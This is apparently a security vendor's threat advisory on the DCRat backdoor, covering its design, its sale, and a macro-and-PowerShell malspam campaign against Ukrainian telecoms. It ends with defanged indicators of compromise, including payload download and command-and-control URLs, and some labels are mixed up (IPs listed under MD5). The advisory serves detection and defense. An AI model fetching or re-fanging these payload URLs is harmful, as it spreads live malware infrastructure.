Rewterz Threat Advisory – Multiple IBM Db2 Vulnerabilities
June 27, 2022Rewterz Threat Advisory – CVE-2022-31093 – Node.js next-auth module Vulnerability
June 28, 2022Rewterz Threat Advisory – Multiple IBM Db2 Vulnerabilities
June 27, 2022Rewterz Threat Advisory – CVE-2022-31093 – Node.js next-auth module Vulnerability
June 28, 2022Severity
High
Analysis Summary
DCRat – a Russian backdoor, was initially introduced in 2018, but rebuilt and relaunched a year later. The DCRat backdoor appears to be the product of a single threat actor who goes online with the pseudonyms of “boldenis44,” “crystalcoder,” and Кодер (“Coder”).
DCRat is one of the cheapest commercial RATs. For a two-month membership, the price starts at 500 RUB (less than 5 GBP/US$6), and it periodically drops even cheaper during special offers. This is written in .NET and features a modular structure, allowing affiliates to create their own plugins using DCRat Studio, a dedicated integrated development environment (IDE).
The malware’s modular architecture allows it to be extended for a variety of nefarious objectives, including surveillance, reconnaissance, data theft, DDoS attacks, and arbitrary code execution.
The DCRat consists of three parts:
- A stealer/client executable
- The command-and-control (C2) endpoint/ interface is a single PHP page
- An administrator tool
The malware is still in development, the author announces any news and updates through a dedicated Telegram channel with about 3k users updated with any news and changes.
Recently, the DarkCrystal RAT has been used in attacks against Ukrainian telecom operators, according to the Ukrainian Response Team. The malspam messages employ the password-protected attachment “Algorithm of actions of members of the family of a missing serviceman LegalAid.rar” with the subject line “Free main legal aid.”
According to them,
When the “Algorithm LegalAid.xlsm” file is opened, and the macro is enabled, a PowerShell command will be executed. The malware DarkCrystal RAT will be downloaded and launched by the script, which will also download and run the.NET bootloader “MSCommondll.exe.”
Based on the information, it is assumed that this attack is directed against operators and wireless providers of Ukraine.
Impact
Data Theft
Exposure of Sensitive Data
Indicators of Compromise
Domain Name
- datagroup[.]ddns[.]no
MD5
- 203[.]96[.]191[.]70
- 31[.]7[.]58[.]82
MD5
- b726312450e28faa38396736be1b00fb
- fd2e0ec9021783dba1c9744fa730e5b9
- 19bbb1b94f66609cbd80945c14486e93
SHA-256
- 2b2438aa8da7c23e714f2d7a196d82ed52914c9353ef9fded01448216bd858ff
- 471af7ed687ef875c6118ec2f440f0dea9a434b54d81b7946f58505676f7c589
- 7cffb54cb07db2f4104b8764ff15799111d06ea81d9c74c09134c61341d74202
SHA-1
- 805a8f5e68c84b45d14250ecd199e15c2c14fc9a
- 1ccb921ca679b14771a5959d4835abcc62ea18ac
- 5a37c52dc94da852dd3c0e674d78b2bb6ec38f41
URL
- http[:]//plexbd[.]net/MSCommonDriver[.]exe
- http[:]//plexbd[.]net/MSCommondll[.]exe
- https[:]//datagroup[.]ddns[.]net/PythonHttpGeolongpolldefault[.]php
Remediation
- Block the threat indicators at their respective controls.
- Search for IOCs in your environment.